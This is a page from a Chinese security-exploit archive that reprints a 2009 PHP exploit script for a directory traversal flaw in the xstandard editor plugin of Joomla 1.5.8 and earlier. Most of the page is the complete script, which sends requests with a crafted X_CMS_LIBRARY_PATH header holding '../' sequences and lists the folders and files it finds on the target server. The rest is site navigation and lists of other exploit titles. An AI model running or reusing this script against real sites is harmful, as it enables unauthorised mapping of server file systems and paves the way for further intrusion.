首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability 来源：irk4z[at]yahoo.pl 作者：irk4z 发布时间：2009-01-07   <?php /* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability discovered by: irk4z[at]yahoo.pl greets: all friends ;) */ echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\n"; echo "* discovered by: irk4z[at]yahoo.pl\n"; echo "*\n"; echo "* greets: all friends ;) enjoy!\n"; echo "*------------------------------------------------------------------*\n"; $host = $argv[1]; $path = $argv[2]; $folder = $argv[3]; if (empty($host) || empty($path)) { echo "usage: php {$argv[0]} <host> <path> [<folder>]\n"; echo "       php {$argv[0]} example.org /joomla\n"; echo "       php {$argv[0]} example.org /joomla ../../\n"; exit; } echo "http://" . $host . $path . "/images/stories/\n\n"; if ( empty($folder) ){ $lev = "./"; for( $i = 0; $i <= 7; $i++ ) { echo browseFolder($host, $path, $lev); $lev .= "../"; } } else { echo browseFolder($host, $path, $folder); } function browseFolder($host, $path, $folder){ $packet = "GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "X_CMS_LIBRARY_PATH: {$folder}\r\n"; $packet .= "Connection: Close\r\n\r\n"; $o = @fsockopen($host, 80); if(!$o){ echo "\n[x] No response...\n"; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo "\n[x] 404 Not Found... Maybe wrong path? \n"; die; } //folders preg_match_all("/<baseURL>([^<]+)<\/baseURL>/", $data, $matches); //files preg_match_all("/<value>([^<]+\.[^<]{3,4})<\/value>/", $data, $matches2); $matches = array_merge( $matches[1], $matches2[1] ); if ( empty($matches) ){ $ret = "$folder [x] Failed...\n"; } else { $ret = ''; foreach( $matches as $tmp){ $ret .= str_replace("images/stories/", '', str_replace("/./", "/", str_replace("//", "/", urldecode($tmp) ) ) ) . "\n"; } } return ($ret); } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Cain & Abel 4.9.25 (Cisco IOS- ·CoolPlayer BUILD 219 'Playlist ·CoolPlayer BUILD 219 (Playlist ·VUPlayer version 2.49 local de ·Perception LiteServe 2.0.1 (us ·SeaMonkey <= 1.1.14 (marquee) ·Audacity 1.6.2 (.aup File) Rem ·Rosoft Media Player 4.2.1 Loca ·VUPlayer <= 2.49 .PLS Universa ·Goople <= 1.8.2 (frontpage.php ·WinAmp GEN_MSN Plugin Heap Buf ·Debian GNU/Linux XTERM (DECRQS   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved